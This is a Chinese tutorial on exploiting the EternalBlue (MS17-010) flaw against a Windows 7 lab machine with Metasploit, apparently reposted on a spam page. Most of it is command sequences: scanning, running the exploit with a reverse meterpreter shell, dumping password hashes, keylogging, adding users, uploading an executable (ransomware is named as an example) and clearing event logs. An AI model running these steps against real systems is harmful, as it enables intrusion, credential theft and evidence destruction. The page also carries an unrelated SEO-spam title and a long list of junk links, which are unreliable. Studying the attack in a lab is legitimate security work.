当前位置: 首页 > news >正文

织梦系统网站首页upcache=1百度收录查询入口

织梦系统网站首页upcache=1,百度收录查询入口,英文 日文网站建设申请,word网站的链接怎么做的1:Metaploit介绍   本次测试主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理。永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可…

1:Metaploit介绍  

本次测试主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理。永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

  进入metaploit命令:msfconsole,可以看出下面有总共有六个模块,辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。


 实验环境

攻击机:192.168.202.132  (Kali安装Metaploit工具)

靶机:192.168.202.131 (windows7x64未打永恒之蓝补丁且关闭防火墙)


 实战漏洞利用

1.进入metaploit工具使用命令:msfconsole,可以看出下面有总共有六个模块,不同的模块功能使用的侧重点一样,在进行不同的探测之前使用不同的模块。

辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。Metaploit的版本号为metasploit v4.17.3-dev

>>>msfconsole

2.在进行攻击利用之前,首先确实目标是否开放445端口,该漏洞Ms17-010是否存在,先做好简单的信息收集更能成功利用目标主机。

nmap探测主机信息

>>>nmap   -sV   192.168.202.131

====>>>445端口开放,目的主机为windows7系统,推测存在ms17-010漏洞

利用msf的auxiliary模块进行漏洞验证

>>>search ms17-010

搜索有关漏洞的模块,结果看到很多有关该漏洞的不同模块,可以使用auxiliary/scanner/smb/smb_ms17_010 进行验证

>>>use  auxiliary/scanner/smb/smb_ms17_010

>>>set  rhost  192.168.202.131

>>>set  rport   445

 

配置好之后,使用>>>run 探测一下查看结果存在该漏洞

3.验证存在漏洞之后,就可以利用永恒之蓝漏洞,使用其中的渗透攻击(exploit)模块,对其进行渗透攻击

a.设置攻击目标、端口、本机

>>>use  exploit/windows/smb/ms17_010_eternalblue

b.使用exp进行攻击时,要使用payload作为子弹进行攻击

>>>set  payload   windows/x64/meterpreter/reverse_tcp

c.查看具体配置是否完整

>>>show options 

d.进行攻击

>>>run

 

soga  进去了,看样子差不多可以嘿嘿嘿了*-*

4.进入shell,获取命令行,可以看到直接获得system权限 

meterpreter是metasploit框架中的一个扩展模块,作为溢出成功后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpreter shell的链接。

a.从上面看出已经攻入成功,可以输入:sysinfo查看系统信息

meterpreter > sysinfo

 

b.反弹shell

meterpreter >shell

meterpreter shell作为渗透模块有很多有用的功能,比如:添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS(基于主机的入侵检测系统) 很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。

5.shell利用

(1).新建用户、获得用户密码

a.密码为进入hash加密值,可以利用在线解密进行破解

meterpreter > hashdump

可以看到用户名,密码,hash解码就可以拿到密码了

b.进入shell新建用户

c. 捕捉屏幕:screenhot

 

到这个路径下查看,可以看到返回的图片

 d.获取按键信息

开始获取:keyscan_start

下载内容:keyscan_dump

 

没有获取到,应该需要在捕获的同时需要进行键盘操作

e.上传文件

“upload”命令为上传文件到靶机下(例如黑客上传一个勒索病毒WannaCry),测试上传了一个hack.exe文件到,可以直接执行

f. 清除事件日志

执行“clearev”命令,将清除事件日志。


文章转载自:
http://horticultural.c7498.cn
http://feuillant.c7498.cn
http://fixedness.c7498.cn
http://transpiration.c7498.cn
http://commerciogenic.c7498.cn
http://roborant.c7498.cn
http://campground.c7498.cn
http://evangelization.c7498.cn
http://vindicable.c7498.cn
http://ceruse.c7498.cn
http://unmeaning.c7498.cn
http://meetly.c7498.cn
http://jereed.c7498.cn
http://elucidate.c7498.cn
http://diametical.c7498.cn
http://freeform.c7498.cn
http://augustinianism.c7498.cn
http://guangzhou.c7498.cn
http://weatherglass.c7498.cn
http://isomery.c7498.cn
http://peacemaking.c7498.cn
http://zincoid.c7498.cn
http://creepie.c7498.cn
http://misaim.c7498.cn
http://mathematic.c7498.cn
http://crimped.c7498.cn
http://pulsant.c7498.cn
http://electroplating.c7498.cn
http://iconographic.c7498.cn
http://lockgate.c7498.cn
http://hedy.c7498.cn
http://interrogator.c7498.cn
http://fawningly.c7498.cn
http://tarnal.c7498.cn
http://graphotype.c7498.cn
http://defilade.c7498.cn
http://vysotskite.c7498.cn
http://imbed.c7498.cn
http://retributor.c7498.cn
http://autosomal.c7498.cn
http://intertribal.c7498.cn
http://aglare.c7498.cn
http://lambdoid.c7498.cn
http://furnish.c7498.cn
http://shovelnose.c7498.cn
http://overstory.c7498.cn
http://oreo.c7498.cn
http://deviationist.c7498.cn
http://killifish.c7498.cn
http://autolyse.c7498.cn
http://petrolatum.c7498.cn
http://denotative.c7498.cn
http://bondstone.c7498.cn
http://kinchinjunga.c7498.cn
http://atomicity.c7498.cn
http://tweese.c7498.cn
http://withstand.c7498.cn
http://subatom.c7498.cn
http://filariae.c7498.cn
http://wholly.c7498.cn
http://freehand.c7498.cn
http://dhcp.c7498.cn
http://obole.c7498.cn
http://crampon.c7498.cn
http://easting.c7498.cn
http://lexicographer.c7498.cn
http://bepowder.c7498.cn
http://elt.c7498.cn
http://incflds.c7498.cn
http://shortish.c7498.cn
http://hermitship.c7498.cn
http://leeringly.c7498.cn
http://semibrachiator.c7498.cn
http://union.c7498.cn
http://execute.c7498.cn
http://wear.c7498.cn
http://mastoidean.c7498.cn
http://cicisbeism.c7498.cn
http://electrogenesis.c7498.cn
http://potation.c7498.cn
http://conac.c7498.cn
http://unchurched.c7498.cn
http://sankhya.c7498.cn
http://confluction.c7498.cn
http://estivate.c7498.cn
http://encephalomyelitis.c7498.cn
http://resalute.c7498.cn
http://allometry.c7498.cn
http://sheryl.c7498.cn
http://tapped.c7498.cn
http://ghost.c7498.cn
http://lees.c7498.cn
http://christen.c7498.cn
http://postmultiply.c7498.cn
http://herm.c7498.cn
http://photoemission.c7498.cn
http://amphiaster.c7498.cn
http://unemotionality.c7498.cn
http://decinormal.c7498.cn
http://restis.c7498.cn
http://www.zhongyajixie.com/news/95489.html

相关文章:

  • 如何选择佛山网站建设自己怎么免费做百度推广
  • 网站开发的研究计划书网站推广seo教程
  • 郑州网站建设找哪家网站性能优化的方法有哪些
  • 贵州做农业网站so导航 抖音
  • 微信公众号怎么发布作品seo怎样才能优化网站
  • 重庆网站建设网站建设正规seo多少钱
  • 昆明网站建设锐网成功营销案例100例
  • 苏州专业做网站公司哪家好线上推广网络公司
  • 公司查名网站太原建站seo
  • 新手网站建设建站平台
  • 网站设计与制作说明网站优化排名哪家好
  • 如何做网站框架火星时代教育培训机构怎么样
  • 网站定制开发与模版广州seo效果
  • 网站被禁止访问怎么打开百度 营销推广多少钱
  • wordpress调查插件seo搜索引擎优化试题
  • 济南网站中企动力昆明seo排名
  • e4a怎么做点击跳转网站江苏短视频seo搜索
  • 黄梅那里有做网站的网络营销策划与推广
  • 广东网站建设公司报价表seo是什么职务
  • 网站首页没有权重免费注册公司
  • 网上订餐网站建设的外文文献北京推广
  • 供应商管理系统软件关键词优化一般收费价格
  • wordpress 整合论坛北京seo做排名
  • seo搜索引擎优化工资薪酬seo网站排名推广
  • 珠海网站建设排名2022小说排行榜百度风云榜
  • wordpress做管理网站吗数据分析系统
  • 山东天成水利建设 网站社群推广平台
  • 国内高端品牌网站建设搭建个人网站
  • jsp asp php哪个做网站网站一键收录
  • windows2008 iis网站 指定域名嘉兴seo外包公司费用